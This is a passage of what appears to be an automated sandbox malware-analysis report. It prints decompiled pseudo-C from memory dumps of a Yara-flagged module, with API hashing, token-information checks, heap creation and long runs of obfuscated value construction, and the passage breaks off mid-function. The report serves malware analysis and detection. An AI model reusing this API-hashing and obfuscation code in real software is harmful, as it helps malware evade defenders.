                                                                                                                                      					L5:
                                                                                                                                      					return 0;
                                                                                                                                      				}
                                                                                                                                      				_push(_t25);
                                                                                                                                      				_push(8);
                                                                                                                                      				_push(_t24);
                                                                                                                                      				if( *_t21() == 0 || E73232F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
                                                                                                                                      					goto L5;
                                                                                                                                      				} else {
                                                                                                                                      					_t2 = _t25 + 8 - 4; // 0xd0443454
                                                                                                                                      					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                      						goto L5;
                                                                                                                                      					}
                                                                                                                                      					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
                                                                                                                                      				}
                                                                                                                                      			}









                                                                                                                                      0x732310da
                                                                                                                                      0x732310dc
                                                                                                                                      0x732310ea
                                                                                                                                      0x732310ee
                                                                                                                                      0x73231137
                                                                                                                                      0x00000000
                                                                                                                                      0x73231137
                                                                                                                                      0x732310f3
                                                                                                                                      0x732310f4
                                                                                                                                      0x732310f6
                                                                                                                                      0x732310fb
                                                                                                                                      0x00000000
                                                                                                                                      0x73231114
                                                                                                                                      0x73231118
                                                                                                                                      0x73231125
                                                                                                                                      0x73231129
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73231132

                                                                                                                                      APIs
                                                                                                                                      • GetTokenInformation.KERNELBASE(00000004,00000014,D0443454,00000004,D0443458,D0443458,D0443458), ref: 73231125
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InformationToken
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4114910276-0
                                                                                                                                      • Opcode ID: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
                                                                                                                                      • Instruction ID: 2913d4ed3f088b4643fab1ac39da30e4db70bb0ab39c9e086e6b49ccac091f3c
                                                                                                                                      • Opcode Fuzzy Hash: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
                                                                                                                                      • Instruction Fuzzy Hash: 33F0CDF57043476BFF04A5288D04FBF22ED5BC2A00F80CC38B581DA188EAB8D8858721
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 35%
                                                                                                                                      			E73233564(void* __ecx) {
                                                                                                                                      				void* _t3;
                                                                                                                                      				intOrPtr* _t8;
                                                                                                                                      				void* _t12;
                                                                                                                                      
                                                                                                                                      				_t12 = __ecx;
                                                                                                                                      				if( *0x7323d228 == 0xcd845700) {
                                                                                                                                      					_t8 = E73232F8C(0xa5eabdf8, 0xd926c223);
                                                                                                                                      					 *0x7323d22c = E73232F8C(0xa5eabdf8, 0x9b42cb07);
                                                                                                                                      					if( *0x7323d228 == 0xcd845700) {
                                                                                                                                      						 *_t8(2, 0, 0, 0, 0, 0); // executed
                                                                                                                                      						 *0x7323d228 = 0;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t3 = E73232F8C(0xa5eabdf8, 0x80febacc);
                                                                                                                                      				if(_t3 == 0) {
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					_push(_t12);
                                                                                                                                      					_push(8);
                                                                                                                                      					_push( *0x7323d228);
                                                                                                                                      					asm("int3");
                                                                                                                                      					return _t3;
                                                                                                                                      				}
                                                                                                                                      			}






                                                                                                                                      0x7323356c
                                                                                                                                      0x73233574
                                                                                                                                      0x732335a7
                                                                                                                                      0x732335b8
                                                                                                                                      0x732335c3
                                                                                                                                      0x732335ce
                                                                                                                                      0x732335d0
                                                                                                                                      0x732335d0
                                                                                                                                      0x732335c3
                                                                                                                                      0x73233580
                                                                                                                                      0x73233587
                                                                                                                                      0x73233597
                                                                                                                                      0x73233589
                                                                                                                                      0x73233589
                                                                                                                                      0x7323358a
                                                                                                                                      0x7323358c
                                                                                                                                      0x7323358e
                                                                                                                                      0x7323358f
                                                                                                                                      0x7323358f

                                                                                                                                      APIs
                                                                                                                                      • RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,A5EABDF8,9B42CB07,A5EABDF8,D926C223,?,?,00000000,7322DEB9,?,?), ref: 732335CE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                      • Opcode ID: 2b5f23cdeda9450ec54481bb6493da4b6360a7292d0891a9ee0cd2b8c4d816af
                                                                                                                                      • Instruction ID: 6bf832f09b60500596ce7c4c2164ddfb7be5573ed8427c566d5a04896b121d1a
                                                                                                                                      • Opcode Fuzzy Hash: 2b5f23cdeda9450ec54481bb6493da4b6360a7292d0891a9ee0cd2b8c4d816af
                                                                                                                                      • Instruction Fuzzy Hash: F8F0AEF320C316BED2521B76AC04F16BEECEFCA717BE48428B745AA081D65545C0D621
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                      			E73229144(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                      				intOrPtr _v20;
                                                                                                                                      				intOrPtr _v40;
                                                                                                                                      				char _v60;
                                                                                                                                      				intOrPtr _v92;
                                                                                                                                      				void* _v96;
                                                                                                                                      				char _v100;
                                                                                                                                      				char _v104;
                                                                                                                                      				char _v108;
                                                                                                                                      				intOrPtr _v112;
                                                                                                                                      				signed int _v116;
                                                                                                                                      				char _v128;
                                                                                                                                      				intOrPtr _v132;
                                                                                                                                      				void* _v136;
                                                                                                                                      				intOrPtr _v144;
                                                                                                                                      				intOrPtr _v148;
                                                                                                                                      				intOrPtr _v156;
                                                                                                                                      				char _v160;
                                                                                                                                      				signed int _v164;
                                                                                                                                      				char _v168;
                                                                                                                                      				signed int _v172;
                                                                                                                                      				signed int _v176;
                                                                                                                                      				signed int _v180;
                                                                                                                                      				signed int _v184;
                                                                                                                                      				intOrPtr _v188;
                                                                                                                                      				signed int _v192;
                                                                                                                                      				char _v196;
                                                                                                                                      				void* _v200;
                                                                                                                                      				signed int _v204;
                                                                                                                                      				char _v208;
                                                                                                                                      				char _v212;
                                                                                                                                      				char _v216;
                                                                                                                                      				intOrPtr _v220;
                                                                                                                                      				intOrPtr _v228;
                                                                                                                                      				intOrPtr _v236;
                                                                                                                                      				void* _v268;
                                                                                                                                      				char _v292;
                                                                                                                                      				char _v308;
                                                                                                                                      				char _v316;
                                                                                                                                      				char _v320;
                                                                                                                                      				void* _v324;
                                                                                                                                      				char _v332;
                                                                                                                                      				char _v340;
                                                                                                                                      				void* _v356;
                                                                                                                                      				void* _v360;
                                                                                                                                      				char _v364;
                                                                                                                                      				char _v380;
                                                                                                                                      				signed int _v388;
                                                                                                                                      				intOrPtr _v392;
                                                                                                                                      				signed int _v396;
                                                                                                                                      				intOrPtr _v400;
                                                                                                                                      				signed int _v404;
                                                                                                                                      				char _v408;
                                                                                                                                      				void* _v412;
                                                                                                                                      				char _v416;
                                                                                                                                      				signed int* _v420;
                                                                                                                                      				char _v424;
                                                                                                                                      				char _v428;
                                                                                                                                      				char _v432;
                                                                                                                                      				char _v436;
                                                                                                                                      				intOrPtr _v440;
                                                                                                                                      				signed int* _v444;
                                                                                                                                      				char _v448;
                                                                                                                                      				void* _v452;
                                                                                                                                      				intOrPtr _v460;
                                                                                                                                      				char _v464;
                                                                                                                                      				void* _v468;
                                                                                                                                      				char _v472;
                                                                                                                                      				intOrPtr _v476;
                                                                                                                                      				char _v480;
                                                                                                                                      				void* _v484;
                                                                                                                                      				char _v492;
                                                                                                                                      				char _v496;
                                                                                                                                      				void* _v500;
                                                                                                                                      				char _v508;
                                                                                                                                      				char _v516;
                                                                                                                                      				signed int _v520;
                                                                                                                                      				char _v524;
                                                                                                                                      				char _v528;
                                                                                                                                      				char _v532;
                                                                                                                                      				char _v536;
                                                                                                                                      				char _v540;
                                                                                                                                      				char _v544;
                                                                                                                                      				void* _v548;
                                                                                                                                      				char _v552;
                                                                                                                                      				char _v556;
                                                                                                                                      				char _v560;
                                                                                                                                      				signed int _v564;
                                                                                                                                      				signed int _v568;
                                                                                                                                      				char _v572;
                                                                                                                                      				char _v576;
                                                                                                                                      				char _v580;
                                                                                                                                      				char _v584;
                                                                                                                                      				char _v588;
                                                                                                                                      				char _v592;
                                                                                                                                      				char _v596;
                                                                                                                                      				char _v600;
                                                                                                                                      				char _v604;
                                                                                                                                      				char _v608;
                                                                                                                                      				char _v612;
                                                                                                                                      				char _v616;
                                                                                                                                      				char _v620;
                                                                                                                                      				char _v624;
                                                                                                                                      				signed int _v628;
                                                                                                                                      				char _v632;
                                                                                                                                      				char _v636;
                                                                                                                                      				char _v640;
                                                                                                                                      				char _v644;
                                                                                                                                      				char _v648;
                                                                                                                                      				char _v652;
                                                                                                                                      				char _v656;
                                                                                                                                      				void* __ebx;
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				void* _t437;
                                                                                                                                      				intOrPtr _t442;
                                                                                                                                      				signed int _t444;
                                                                                                                                      				char* _t459;
                                                                                                                                      				char _t534;
                                                                                                                                      				signed int _t544;
                                                                                                                                      				intOrPtr _t546;
                                                                                                                                      				signed int _t550;
                                                                                                                                      				signed int _t556;
                                                                                                                                      				intOrPtr _t561;
                                                                                                                                      				signed int _t567;
                                                                                                                                      				char _t579;
                                                                                                                                      				intOrPtr _t584;
                                                                                                                                      				char _t585;
                                                                                                                                      				intOrPtr _t589;
                                                                                                                                      				char _t590;
                                                                                                                                      				intOrPtr _t594;
                                                                                                                                      				char _t595;
                                                                                                                                      				intOrPtr _t599;
                                                                                                                                      				char _t600;
                                                                                                                                      				intOrPtr _t604;
                                                                                                                                      				char _t605;
                                                                                                                                      				intOrPtr _t609;
                                                                                                                                      				signed int _t622;
                                                                                                                                      				char _t629;
                                                                                                                                      				intOrPtr _t633;
                                                                                                                                      				signed char* _t635;
                                                                                                                                      				signed int _t638;
                                                                                                                                      				intOrPtr _t641;
                                                                                                                                      				signed int* _t647;
                                                                                                                                      				signed int* _t650;
                                                                                                                                      				intOrPtr _t665;
                                                                                                                                      				char* _t806;
                                                                                                                                      				signed int* _t836;
                                                                                                                                      				char* _t837;
                                                                                                                                      				char* _t844;
                                                                                                                                      				void* _t845;
                                                                                                                                      				intOrPtr* _t854;
                                                                                                                                      				signed int* _t856;
                                                                                                                                      				intOrPtr* _t857;
                                                                                                                                      				signed int* _t858;
                                                                                                                                      				signed int* _t860;
                                                                                                                                      				signed int* _t863;
                                                                                                                                      				intOrPtr _t864;
                                                                                                                                      				intOrPtr _t867;
                                                                                                                                      				char _t868;
                                                                                                                                      				signed int _t869;
                                                                                                                                      				intOrPtr* _t872;
                                                                                                                                      				intOrPtr* _t874;
                                                                                                                                      				intOrPtr* _t875;
                                                                                                                                      				intOrPtr* _t876;
                                                                                                                                      				intOrPtr* _t877;
                                                                                                                                      				intOrPtr* _t878;
                                                                                                                                      				signed int* _t881;
                                                                                                                                      				intOrPtr* _t882;
                                                                                                                                      				char* _t907;
                                                                                                                                      				void* _t935;
                                                                                                                                      				char _t950;
                                                                                                                                      				char _t951;
                                                                                                                                      				intOrPtr* _t953;
                                                                                                                                      				void* _t954;
                                                                                                                                      				intOrPtr* _t955;
                                                                                                                                      				void* _t957;
                                                                                                                                      
                                                                                                                                      				_t957 = __eflags;
                                                                                                                                      				_t953 =  &_v496;
                                                                                                                                      				_t641 = __edx;
                                                                                                                                      				_v40 = __ecx;
                                                                                                                                      				_t951 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                                                      				E73232F8C(0x23627913, 0xae88daa3);
                                                                                                                                      				_v496 = 0;
                                                                                                                                      				E7322F620( &_v492, 0);
                                                                                                                                      				_v480 = 0;
                                                                                                                                      				_v476 = 0;
                                                                                                                                      				E7322F620( &_v472, 0);
                                                                                                                                      				_v528 = 0;
                                                                                                                                      				E7322F620( &_v524, 0);
                                                                                                                                      				_v392 = 0x4145240a;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				asm("movq [ecx+0x90], xmm0");
                                                                                                                                      				E7322F8C4( &_v528, E7322F568( &_v528) + 0x10);
                                                                                                                                      				E7322F558( &_v532, E7322F568( &_v532) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v540 = _v540 + 1;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v536 + 0x88)) = 0x22dc1034;
                                                                                                                                      				asm("movq [ecx+0x90], xmm0");
                                                                                                                                      				E7322F8C4( &_v536, E7322F568( &_v536) + 0x10);
                                                                                                                                      				E7322F558( &_v540, E7322F568( &_v540) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v548 = _v548 + 1;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v544 + 0x88)) = 0xc06fd820;
                                                                                                                                      				asm("movq [ecx+0x90], xmm0");
                                                                                                                                      				E7322F8C4( &_v544, E7322F568( &_v544) + 0x10);
                                                                                                                                      				E7322F558( &_v548, E7322F568( &_v548) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v556 = _v556 + 1;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v552 + 0x88)) = 0xa54975b2;
                                                                                                                                      				asm("movq [ecx+0x90], xmm0");
                                                                                                                                      				E7322F8C4( &_v552, E7322F568( &_v552) + 0x10);
                                                                                                                                      				E7322F558( &_v556, E7322F568( &_v556) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v564 = _v564 + 1;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v560 + 0x88)) = 0x271e028;
                                                                                                                                      				asm("movq [ecx+0x90], xmm0");
                                                                                                                                      				E7322F8C4( &_v560, E7322F568( &_v560) + 0x10);
                                                                                                                                      				E7322F558( &_v564, E7322F568( &_v564) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v572 = _v572 + 1;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				( &_v568)[0x22] = 0xf279aa39;
                                                                                                                                      				asm("movq [ecx+0x90], xmm0");
                                                                                                                                      				E7322F8C4( &_v568, E7322F568( &_v568) + 0x10);
                                                                                                                                      				E7322F558( &_v572, E7322F568( &_v572) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				 *_t953 =  *_t953 + 1;
                                                                                                                                      				E7323413C(0xa5eabdf8, _t953);
                                                                                                                                      				E7322F558( &_v576, 0);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [esp+0x4c], xmm0");
                                                                                                                                      				E7322F558( &_v580, 0x10);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [esp+0x54], xmm0");
                                                                                                                                      				E7322F558( &_v584, 0x20);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [esp+0x64], xmm0");
                                                                                                                                      				E7322F558( &_v588, 0x30);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [esp+0x6c], xmm0");
                                                                                                                                      				E7322F558( &_v592, 0x40);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [esp+0x74], xmm0");
                                                                                                                                      				E7322F558( &_v596, 0x50);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [esp+0x7c], xmm0");
                                                                                                                                      				_v584 = _t951;
                                                                                                                                      				E7322ADB8( &_v584,  &_v172, _t957,  &_v192);
                                                                                                                                      				_t889 = _v176;
                                                                                                                                      				_t931 = _v172;
                                                                                                                                      				if((_v176 | _v172) != 0) {
                                                                                                                                      					E7322B338( &_v308, _t951, __eflags, _t889, _t931);
                                                                                                                                      					E7322F8DC( &_v516, __eflags);
                                                                                                                                      					_v520 = 0;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					 *((intOrPtr*)( &_v516 + 0x88)) = 0x5889e652;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v516, E7322F568( &_v516) + 0x10);
                                                                                                                                      					E7322F558( &_v520, E7322F568( &_v520) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_v528 = _v528 + 1;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					 *((intOrPtr*)( &_v524 + 0x88)) = 0x1eeb5e35;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v524, E7322F568( &_v524) + 0x10);
                                                                                                                                      					E7322F558( &_v528, E7322F568( &_v528) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_v536 = _v536 + 1;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					 *((intOrPtr*)( &_v532 + 0x88)) = 0xac5d5303;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v532, E7322F568( &_v532) + 0x10);
                                                                                                                                      					E7322F558( &_v536, E7322F568( &_v536) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_v544 = _v544 + 1;
                                                                                                                                      					_t954 = _t953 + 0xfffffff4;
                                                                                                                                      					asm("movq xmm0, [esp+0x1bc]");
                                                                                                                                      					asm("movq [esp], xmm0");
                                                                                                                                      					_v548 =  &_v544;
                                                                                                                                      					E7322BAB8( &_v340, __eflags);
                                                                                                                                      					E7322F558( &_v552, 0);
                                                                                                                                      					asm("movq xmm0, [eax+0x8]");
                                                                                                                                      					asm("movq [esp+0x5c], xmm0");
                                                                                                                                      					E7322F558( &_v556, 0x10);
                                                                                                                                      					asm("movq xmm0, [eax+0x8]");
                                                                                                                                      					asm("movq [esp+0x84], xmm0");
                                                                                                                                      					_t935 = E7322F558( &_v560, 0x20);
                                                                                                                                      					_v164 =  *((intOrPtr*)(_t935 + 8));
                                                                                                                                      					_v144 =  *((intOrPtr*)(_t935 + 0xc));
                                                                                                                                      					E7322F620( &_v396, 0);
                                                                                                                                      					E7322F620( &_v416, 0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_push( *0x7323b7c4);
                                                                                                                                      					E732320A4(__eflags,  &_v100);
                                                                                                                                      					E7322F75C( &_v416, __eflags);
                                                                                                                                      					E7322E054( &_v100);
                                                                                                                                      					E7322F8C4( &_v436, E7322F744( &_v420,  &_v100));
                                                                                                                                      					_t437 = E7322F558( &_v424, 0);
                                                                                                                                      					E73227970(_t951, _t437, E7322F558( &_v444, 0), _v112);
                                                                                                                                      					_t442 = E7322F568( &_v448);
                                                                                                                                      					_v228 = _t442;
                                                                                                                                      					_t101 = _t442 + 2; // 0x2
                                                                                                                                      					_v188 = E7322B0A4( &_v584, 0x20000000, __eflags, _t101);
                                                                                                                                      					_v236 = 0x20000000;
                                                                                                                                      					_t444 = E7322B0A4( &_v588, 0x80000000, __eflags, 0x82);
                                                                                                                                      					_v184 = _t444;
                                                                                                                                      					_v204 = 0x80000000;
                                                                                                                                      					__eflags = _t444 | _v204;
                                                                                                                                      					if((_t444 | _v204) == 0) {
                                                                                                                                      						L51:
                                                                                                                                      						E7322F6F0( &_v380);
                                                                                                                                      						E7322F6F0( &_v364);
                                                                                                                                      						E7322F6F0( &_v332);
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					__eflags = _v116 | _v164;
                                                                                                                                      					if((_v116 | _v164) == 0) {
                                                                                                                                      						goto L51;
                                                                                                                                      					}
                                                                                                                                      					E732335D4( &_v292, 0, 0x80);
                                                                                                                                      					_t955 = _t954 + 0xc;
                                                                                                                                      					 *((intOrPtr*)( &_v316 + 0x78)) = _v20;
                                                                                                                                      					E7322CDC0( &_v316, 0);
                                                                                                                                      					_t459 =  &_v320;
                                                                                                                                      					_t854 = _t459 + 0xe8;
                                                                                                                                      					 *_t854 = _t641;
                                                                                                                                      					 *((intOrPtr*)(_t854 - 4)) = _v20;
                                                                                                                                      					_push(_t459);
                                                                                                                                      					E7322B48C(_t641, _t459 - 0x20, _t854 - 4, _v20, _t951, _t951, _t854 - 4);
                                                                                                                                      					asm("cdq");
                                                                                                                                      					asm("movd xmm1, eax");
                                                                                                                                      					asm("movd xmm0, edx");
                                                                                                                                      					asm("punpckldq xmm1, xmm0");
                                                                                                                                      					asm("movq [esp+0x134], xmm1");
                                                                                                                                      					_v236 = E7322F568(_v20);
                                                                                                                                      					asm("cdq");
                                                                                                                                      					asm("movd xmm1, eax");
                                                                                                                                      					asm("movd xmm0, edx");
                                                                                                                                      					asm("punpckldq xmm1, xmm0");
                                                                                                                                      					asm("movq [esi+0x8], xmm1");
                                                                                                                                      					_v220 = E7322F568(_t641);
                                                                                                                                      					asm("cdq");
                                                                                                                                      					asm("movd xmm1, eax");
                                                                                                                                      					asm("movd xmm0, edx");
                                                                                                                                      					asm("punpckldq xmm1, xmm0");
                                                                                                                                      					asm("movq [ebx-0x90], xmm1");
                                                                                                                                      					E73233C8C(_t951,  &_v60 - 0x80, __eflags, _v148, _v128, 7,  &_v60);
                                                                                                                                      					_t133 =  &(( &_v564)[0x58]); // 0x160
                                                                                                                                      					_t856 = _t133;
                                                                                                                                      					 *_t856 = _v164;
                                                                                                                                      					_t856[1] = ( &_v564)[0x69];
                                                                                                                                      					E7322F8DC( &_v564, __eflags);
                                                                                                                                      					_v568 = 0;
                                                                                                                                      					_t746 =  &_v564;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					_t136 = _t746 + 0x88; // 0x88
                                                                                                                                      					 *_t136 = 0x853cdd04;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v564, E7322F568( &_v564) + 0x10);
                                                                                                                                      					E7322F558( &_v568, E7322F568( &_v568) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_v576 = _v576 + 1;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					 *((intOrPtr*)( &_v572 + 0x88)) = 0xb162dc4e;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v572, E7322F568( &_v572) + 0x10);
                                                                                                                                      					E7322F558( &_v576, E7322F568( &_v576) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_v584 = _v584 + 1;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					 *((intOrPtr*)( &_v580 + 0x88)) = 0xc15ccc53;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v580, E7322F568( &_v580) + 0x10);
                                                                                                                                      					E7322F558( &_v584, E7322F568( &_v584) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_v592 = _v592 + 1;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					 *((intOrPtr*)( &_v588 + 0x88)) = 0x73f8f999;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v588, E7322F568( &_v588) + 0x10);
                                                                                                                                      					E7322F558( &_v592, E7322F568( &_v592) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_v600 = _v600 + 1;
                                                                                                                                      					_t762 =  &_v596;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					_t160 = _t762 + 0x88; // 0xa8
                                                                                                                                      					 *_t160 = 0x4145240a;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v596, E7322F568( &_v596) + 0x10);
                                                                                                                                      					E7322F558( &_v600, E7322F568( &_v600) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_v608 = _v608 + 1;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					 *((intOrPtr*)( &_v604 + 0x88)) = 0xf06b4c6b;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v604, E7322F568( &_v604) + 0x10);
                                                                                                                                      					E7322F558( &_v608, E7322F568( &_v608) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_v616 = _v616 + 1;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					 *((intOrPtr*)( &_v612 + 0x88)) = 0x7d07f92f;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v612, E7322F568( &_v612) + 0x10);
                                                                                                                                      					E7322F558( &_v616, E7322F568( &_v616) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_v624 = _v624 + 1;
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					 *((intOrPtr*)( &_v620 + 0x88)) = 0x2c2324e8;
                                                                                                                                      					asm("movq [eax+0x8], xmm0");
                                                                                                                                      					E7322F8C4( &_v620, E7322F568( &_v620) + 0x10);
                                                                                                                                      					E7322F558( &_v624, E7322F568( &_v624) + 0xfffffff0);
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					asm("movsd");
                                                                                                                                      					_t857 = _t955;
                                                                                                                                      					 *_t857 =  *_t857 + 1;
                                                                                                                                      					E7323413C(0xa5eabdf8, _t857);
                                                                                                                                      					E7322F558( &_v628, 0);
                                                                                                                                      					asm("movq xmm0, [eax+0x8]");
                                                                                                                                      					asm("movq [esp+0xf4], xmm0");
                                                                                                                                      					E7322F558( &_v632, 0x10);
                                                                                                                                      					asm("movq xmm0, [eax+0x8]");
                                                                                                                                      					asm("movq [esp+0xfc], xmm0");
                                                                                                                                      					E7322F558( &_v636, 0x20);
                                                                                                                                      					asm("movq xmm0, [eax+0x8]");
                                                                                                                                      					asm("movq [esp+0x104], xmm0");
                                                                                                                                      					E7322F558( &_v640, 0x30);
                                                                                                                                      					asm("movq xmm0, [eax+0x8]");
                                                                                                                                      					asm("movq [esp+0x10c], xmm0");
                                                                                                                                      					E7322F558( &_v644, 0x40);
                                                                                                                                      					asm("movq xmm0, [eax+0x8]");
                                                                                                                                      					asm("movq [esp+0x114], xmm0");
                                                                                                                                      					E7322F558( &_v648, 0x50);
                                                                                                                                      					asm("movq xmm0, [eax+0x8]");
                                                                                                                                      					asm("movq [esp+0x11c], xmm0");
                                                                                                                                      					E7322F558( &_v652, 0x60);
